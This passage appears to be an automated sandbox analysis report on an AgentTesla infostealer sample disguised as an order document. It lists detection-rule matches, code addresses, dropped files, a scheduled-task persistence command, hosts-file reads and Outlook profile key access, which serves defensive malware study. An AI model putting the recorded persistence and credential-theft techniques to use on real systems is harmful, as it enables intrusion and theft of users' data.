        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
        Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0160E87F
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0160E880
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0160BFF4
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07986698
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798A290
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798ACC0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079815E0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07985958
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798F880
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07982348
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798ED18
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798E880
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798F7ED
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07991799
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0799B710
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993F50
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07998678
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0799CD48
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07998BB0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07990A08
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07990040
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993F40
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079926F0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079926E2
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07997E1E
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07998669
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993528
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993D58
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07997D50
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993D48
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07994A80
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993AB9
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0799A2B7
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993AC8
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0799A2C8
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993250
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07993242
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07994A69
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079909F8
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079938B0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_079938C0
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07990006
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0799003A
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07999050
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07999043
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0F2E0DD3
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_0120F5D8
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_01206680
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_0120F920
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CAD0B8
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CADA04
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CAA0FC
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 5_2_02C0E880
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 5_2_02C0E870
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 5_2_02C0BFF4
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.353975152.0000000008FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000000.294120479.0000000000BF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.339949264.0000000003165000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.561914622.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000000.334273963.000000000042A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exeBinary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: WsdnBq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ORDER (6256 OS)#391 PI.exeReversingLabs: Detection: 30%
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeJump to behavior
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\WsdnBq.exe C:\Users\user\AppData\Roaming\WsdnBq.exe
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile created: C:\Users\user\AppData\Roaming\WsdnBq.exeJump to behavior
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF47D.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/5@6/4
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: ORDER (6256 OS)#391 PI.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2236:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeMutant created: \Sessions\1\BaseNamedObjects\pwiUZWOdBetP
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
        Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_0798F663 push ecx; iretd
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 0_2_07996226 push ss; iretd
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA14C8 push eax; iretd
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA0EBD push es; retf
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CAAD5E push es; ret
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA092D push 8B000005h; retf
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA144F push es; ret
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1441 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA141D push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1413 push es; iretd
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1429 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA142D push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1421 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1425 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1439 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA143D push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1431 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA1435 push cs; retf 0006h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA123F push es; retf
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 5_2_0E820FED push FFFFFF8Bh; iretd
        Source: initial sampleStatic PE information: section name: .text entropy: 7.6706447927786225
        Source: initial sampleStatic PE information: section name: .text entropy: 7.6706447927786225
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeFile created: C:\Users\user\AppData\Roaming\WsdnBq.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
